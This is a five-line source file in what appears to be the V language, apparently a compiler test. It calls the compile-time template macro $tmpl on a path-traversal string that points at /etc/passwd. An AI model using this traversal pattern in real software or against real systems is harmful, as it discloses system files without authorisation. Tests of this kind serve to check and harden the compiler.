module asu

fn main() string {
   return $tmpl('../../../../../etc/passwd')
}
